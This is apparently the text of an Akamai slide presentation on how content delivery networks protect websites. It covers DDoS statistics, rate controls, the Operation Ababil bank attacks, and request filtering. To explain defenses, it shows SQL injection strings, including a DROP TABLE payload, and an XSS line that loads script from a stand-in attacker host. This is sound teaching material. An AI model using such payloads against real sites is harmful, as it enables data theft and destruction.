Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Networking

The Role of Content Delivery Networks in Protecting Web Sites from Attacks

advertisement 
The Role of Content Delivery Networks
in
Protecting Web Sites from Attacks
Bruce Maggs
VP for Research, Akamai Technologies
The Akamai Platform and Services
A Global Platform:
Delivering 130,000+ Domains
• 175,000+ Servers
• 1,300+ Networks
• 2,500+ Physical Locations
• 650+ Cities
• 100+ Countries
•
•
•
•
All top 60 ecommerce sites
All top 30 media & entertainment companies
9 of the top 10 banks
All of the top Internet portals
Daily Traffic:
• 33+ Tbps peak
• 19+ million hits per second
• 600+ million IPv4 clients/day
• 4+ trillion deliveries/day
• 30+ petabytes/day
• 10+ million concurrent streams
©2013 AKAMAI | FASTER FORWARDTM
Distributed Denial of Service (DDOS) Attacks
The attacker hopes to overwhelm the content provider’s resources with
requests for service.
Sometimes the attacker employs a “bot army” of compromised
machines.
The attacker tries to issue requests for content that cannot be cached.
The attacker looks for “amplification” where an easy-to-generate
request requires a difficult-to-generate response.
©2013 AKAMAI | FASTER FORWARDTM
Attack Frequency (Attacks Detected and Mitigated)
2014
2013
2012
2011
2010
991
1317
2002
2936
©2013 AKAMAI | FASTER FORWARDTM
5634
Largest Attacks by Year
2014
320
270
2013
190
144
Gbps
Mpps
2005
11
2
2010
2008
2006
2007
18
22
8
11
2009
48
39
29
2011
2012
79
82
68
69
38
15
©2013 AKAMAI | FASTER FORWARDTM
45
Attack Types Q3 2014
©2013 AKAMAI | FASTER FORWARDTM
Attack Origins Q3 2014
Russia
2.97%
Japan
4.10%
India
2.81%
Thailand
2.43%
US
23.95%
Germany
5.78%
Korea
6.13%
China
20.07%
Mexico
14.16%
Brazil
17.60%
©2013 AKAMAI | FASTER FORWARDTM
Targeted Industry Sectors
Business Services
0.20%
Software &
Technology
19.44%
Public Sector
1.40%
Education
2.20%
Financial Services
9.22%
Avoid data theft and downtime by extending the
security perimeter outside the data-center and
protect from increasing frequency, scale and
sophistication of web attacks.
Gaming
33.67%
Media &
Entertainment
23.65%
Internet & Telecom
8.82%
Health Care & Life
Hotel & Travel
Sciences
1.20%
0.20%
©2013 AKAMAI | FASTER FORWARDTM
The Akamai Platform Provides a Perimeter Defense
Origin Server
End User
Origin
Traffic
Akamai
Traffic
10000
10000
1000
1000
100
100
10
10
1
1
©2013 AKAMAI | FASTER FORWARDTM
Defeating HTTP flooding attacks – Rate Controls
1. Count the number of Forward Requests
2. Block any IP address with excessive forward requests
Akamai
Edge Server
Customer
Origin
Forward
Request
Client
Request
X
Custom
Error page
Forward
Response
©2013 AKAMAI | FASTER FORWARDTM
Filtering Out Malformed Requests
• SQL injection attacks
• Cross-site scripting (XSS) attacks
• Cache busting attacks
©2013 AKAMAI | FASTER FORWARDTM
Relational databases
Relational databases store tables consisting of rows and columns.
(image from http://support.sas.com)
©2013 AKAMAI | FASTER FORWARDTM
Structured Query Language (SQL)
Example Query:
SELECT * FROM Employees WHERE LName = ’PARKER’;
IdNum
1354
LName
PARKER
FName
MARY
JobCode
FA3
©2013 AKAMAI | FASTER FORWARDTM
Salary
65800
Phone
914/455-2337
Example SQL Injection
Suppose a program creates the following SQL query, where userName is a variable
holding input provided by an end-user, e.g., through a form on a Web page.
SELECT * FROM Employees WHERE LName = ’” + userName + ”’;”
But instead of entering a name like PARKER the user enters
’ or ’1’=’1
Then the query becomes
SELECT * FROM Employees WHERE LName = ’’ or ’1’=’1’;
This query returns all rows in the Employees table!
©2013 AKAMAI | FASTER FORWARDTM
A More Destructive Injection
Same code as before:
SELECT * FROM Employees WHERE LName = ’” + userName + ”’;”
But now suppose the user enters
a’; DROP TABLE Employees
Then the query becomes
SELECT * FROM Employees WHERE LName = ’a’; DROP TABLE Employees;
This query might delete the Employees table! (Not all databases allow two queries in
the same string.)
©2013 AKAMAI | FASTER FORWARDTM
bobby-tables.com: A guide to preventing SQL injection
(from the comic strip xkcd)
©2013 AKAMAI | FASTER FORWARDTM
Cross-Site Scripting
Attacker types this into text entry form:
<script src=http://theftsRus.com/script.js></script>
Attacker hopes that later the site will insert this into the HTML that it
outputs, and then the victim’s browser will execute the script.
©2013 AKAMAI | FASTER FORWARDTM
Cache Busting
Attacker adds query strings to the end of a requested URL, e.g.,
http://ak.xyz.com/logo.gif?id=832164328
Attacker hopes that the CDN will view each request with a different query
string as a request for a different object, and fetch a new copy from the
content provider.
©2013 AKAMAI | FASTER FORWARDTM
Operation Ababil
“none of the U.S banks will be safe from our attacks”
Phase 1
Sep 12 – Early Nov 2012
• DNS packets with
“AAAAA” payload
• Limited Layer 7 attacks
• Early-mid Oct 2012
announced names of
banks where attacks
succeeded
• (Did not announce bank
names if attacks were
unsuccessful)
• Began use of HTTP
dynamic content to
circumvent static
caching defenses
Phase 2
Dec 12, 2012 – Jan 29
• Incorporate random
query strings and
values
• Addition of random
query strings against
PDFs
• Additions to bot
army
• Burst probes to
bypass rate-limiting
controls
• Addition of valid
argument names,
random values
Phase 3
Late Feb 2013 – May 2013
• Multiple probes
• Multiple targets
• Increased focus on Layer
7 attacks
• Target banks where
attacks work
• Fraudsters take
advantage
©2013 AKAMAI | FASTER FORWARDTM
Phase 4
July 2013 –
• Used fake plug-ins to
infect files
Phase 1 Attack – Sept 2012
DNS Traffic Handled by Akamai
1.8 M
Attack Traffic:
1.6 M
23 Gbps
1.4 M
(10,000X normal)
1.2 M
1.0 M
0.8 M
Duration:
4.5 Hours
0.6 M
0.4 M
High volume of non-standard packets sent to UDP port 53
Packets did not include a valid DNS header
Packets consisted of large blocks of repeating “A”s
The packets were abnormally large
Simultaneously, a SYN-Flood was directed against
TCP port 53
0.2 M
s
0.0
Tues 12:00
Wed 00:00
Total eDNS
20
©2013 AKAMAI | FASTER FORWARDTM
Wed12:00
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5
QCF targeted PDF files
Akamai Dynamic Caching
Rules offloaded 100% of the
traffic
No Origin Impact
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5
QCF targeted marketing web pages
Rate controls automatically activated
Attack was deflected, far from bank’s datacenter
No Origin Impact
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
Bank #1
Bank #2
Bank #3
Bank #4
Bank #5
QCF targeted SSL
Akamai offloaded 99% of the
traffic
No Origin Impact
©2013 AKAMAI | FASTER FORWARDTM
Phase 2 Attacks - January 2nd, 2013
NOT on Akamai
Bank #1
Bank #2
Bank #3
Gomez agents in 12 cities measuring hourly
12:03 PM
Bank #4
Bank #5
Error/Outage—site not responding
©2013 AKAMAI | FASTER FORWARDTM
9:00 AM
Phase 2 Attacks - January 2nd, 2013
NOT on Akamai
Bank #1
Bank #2
Bank #3
Gomez agents in 12 cities measuring hourly
12:44 PM
Bank #4
Bank #5
Error/Outage—site not responding
©2013 AKAMAI | FASTER FORWARDTM
6:21 PM
Phase 3 Attack Example
• Attack started at March 5, 2013 morning
• Peak Attack Traffic > 126 thousand requests per second
• 70x normal Edge Bandwidth (29Gbps)
•
Origin Traffic stayed at normal levels
• ~2000 Agents participated in the 20 minute assault
•
80% of the agents were new IP addresses that had not participated in earlier
campaigns
©2013 AKAMAI | FASTER FORWARDTM
Attack Tactics - Pre-attack Reconnaissance
Attackers test the site with short burst high speed probes
• Short bursts of attack requests on non-cacheable content every 10 minutes
• Peak of 18 million requests per second
If the site falters, they announce that they will attack that bank and return
later with a full scale attack
If the site is resilient they move on
©2013 AKAMAI | FASTER FORWARDTM
Observations
Due to recent attack sizes, infrastructure capacity build out is not
economical, and may not work anyway
• Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume
The burst speed of attacks has become too fast for reactive mitigation – a
proactive “always-on” defense is necessary
©2013 AKAMAI | FASTER FORWARDTM
Related documents
Engineering a Content Delivery Network Bruce Maggs
Engineering a Content Delivery Network Bruce Maggs
Engineering a Content Delivery Network Bruce Maggs COMPSCI 512
Engineering a Content Delivery Network Bruce Maggs COMPSCI 512
Engineering a Content Delivery Network Bruce Maggs
Engineering a Content Delivery Network Bruce Maggs
Presentation
Presentation
Akamai OS War Stories Bruce Maggs
Akamai OS War Stories Bruce Maggs
Engineering a Content Delivery Network Bruce Maggs COMPSCI 514
Engineering a Content Delivery Network Bruce Maggs COMPSCI 514
Engineering a Content Delivery Network Bruce Maggs COMPSCI 512
Engineering a Content Delivery Network Bruce Maggs COMPSCI 512
Download
advertisement